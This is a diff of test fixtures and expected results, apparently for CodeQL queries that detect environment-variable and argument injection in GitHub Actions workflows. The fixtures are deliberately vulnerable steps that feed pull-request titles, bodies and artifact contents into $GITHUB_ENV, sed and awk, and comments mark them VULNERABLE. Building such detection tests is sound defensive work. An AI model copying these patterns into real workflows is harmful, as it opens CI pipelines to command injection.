.github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | @@ -130,3 +127,5 @@ subpaths | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | +| .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected index 23bc7784f760..94e2af8ecaa7 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected @@ -1,6 +1,4 @@ edges -| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | provenance | Config | -| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | provenance | Config | | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | Config | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | Config | @@ -29,17 +27,15 @@ edges | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | Config | | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | | .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | provenance | Config | nodes -| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | -| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | semmle.label | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | semmle.label | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | -| .github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | semmle.label | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | | .github/workflows/test3.yml:13:7:20:4 | Uses Step | semmle.label | Uses Step | @@ -92,5 +88,8 @@ nodes | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | semmle.label | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | semmle.label | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | semmle.label | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | +| .github/workflows/test16.yml:10:9:15:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | semmle.label | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | semmle.label | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml b/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml index 42ba8bf27496..5d841e50dbb4 100644 --- a/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml +++ b/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml @@ -13,36 +13,62 @@ jobs: uses: actions/checkout@v4 with: ref: ${{ github.event.pull_request.head.ref }} - - run: echo "s/FOO/$TITLE/g" - - run: sed "s/FOO/$TITLE/g" - - run: echo "foo" | sed "s/FOO/$TITLE/g" > bar - - run: echo $(echo "foo" | sed "s/FOO/$TITLE/g" > bar) - - run: awk "BEGIN {$TITLE}" - - run: sed -i "s/git_branch = .*/git_branch = \"$GITHUB_HEAD_REF\"/" config.json - run: | + # NOT VULNERABLE + echo "s/FOO/$TITLE/g" + - run: | + # VULNERABLE + sed "s/FOO/$TITLE/g" + - run: | + # VULNERABLE + echo "foo" | sed "s/FOO/$TITLE/g" > bar + - run: | + # VULNERABLE + echo $(echo "foo" | sed "s/FOO/$TITLE/g" > bar) + - run: | + # VULNERABLE + awk "BEGIN {$TITLE}" + - run: | + # VULNERABLE + sed -i "s/git_branch = .*/git_branch = \"$GITHUB_HEAD_REF\"/" config.json + - run: | + # VULNERABLE sed -i "s|git_branch = .*|git_branch = \"$GITHUB_HEAD_REF\"|" config.json - run: | + # VULNERABLE sed -e 's##${TITLE}#' \ -e 's##${{ env.sot_repo }}#' \ -e 's##TITLE#' \ .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky - run: | + # VULNERABLE sed -e 's##TITLE#' \ -e 's##${{ env.sot_repo }}#' \ -e 's##${TITLE}#' \ .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky - run: | + # VULNERABLE BODY=$(git log --format=%s) sed "s/FOO/$BODY/g" > /tmp/foo - - - name: Checkout ref - uses: actions/checkout@v4 - with: - ref: ${{ github.event.pull_request.head.ref }} - - name: Detect new changesets - id: added-files - run: | - delimiter="$(openssl rand -hex 8)" - echo "changesets<<${delimiter}" >> "${GITHUB_OUTPUT}" - echo "$(git diff --name-only --diff-filter=A ${{ steps.comment-branch.outputs.base_sha }} ${{ steps.parse-sha.outputs.sha }} .changeset/*.md)" >> "${GITHUB_OUTPUT}" - echo "${delimiter}" >> "${GITHUB_OUTPUT}" + - run: | + # VULNERABLE + BODY=$(git diff --name-only HEAD) + sed "s/FOO/$BODY/g" > /tmp/foo + - run: | + # VULNERABLE + BODY=$(git diff --name-only HEAD ) + sed "s/FOO/$BODY/g" > /tmp/foo + - run: | + # VULNERABLE + BODY=$(git diff --name-only HEAD^ | xargs) + sed "s/FOO/$BODY/g" > /tmp/foo + - run: | + # NOT VULNERABLE + echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT + - run: | + # NOT VULNERABLE + git log -1 --pretty=%s + - run: | + # NOT VULNERABLE + BODY=$(git log --format=%s) + sed -E 's/\s+/\n/g' <<<"$BODY" diff --git a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected index 1e4051fef432..bd0684d17117 100644 --- a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected @@ -1,29 +1,35 @@ edges -| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | provenance | Config | -| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | provenance | Config | -| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | provenance | Config | -| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | provenance | Config | -| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config | -| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config | nodes | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | semmle.label | sed "s/FOO/$TITLE/g" | -| .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | semmle.label | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | -| .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | -| .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | semmle.label | awk "BEGIN {$TITLE}" | -| .github/workflows/arg_injection.yml:21:14:21:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | semmle.label | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | -| .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | semmle.label | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | -| .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | -| .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | -| .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | +| .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | semmle.label | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | +| .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | semmle.label | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | +| .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | semmle.label | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | +| .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | semmle.label | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | +| .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | semmle.label | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | +| .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | semmle.label | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | +| .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | +| .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | +| .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | +| .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | subpaths #select -| .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | sed | -| .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | sed | -| .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | sed | -| .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | awk | -| .github/workflows/arg_injection.yml:21:14:21:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | .github/workflows/arg_injection.yml:21:14:21:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | .github/workflows/arg_injection.yml:21:14:21:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:21:14:21:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | sed | -| .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | sed | -| .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | 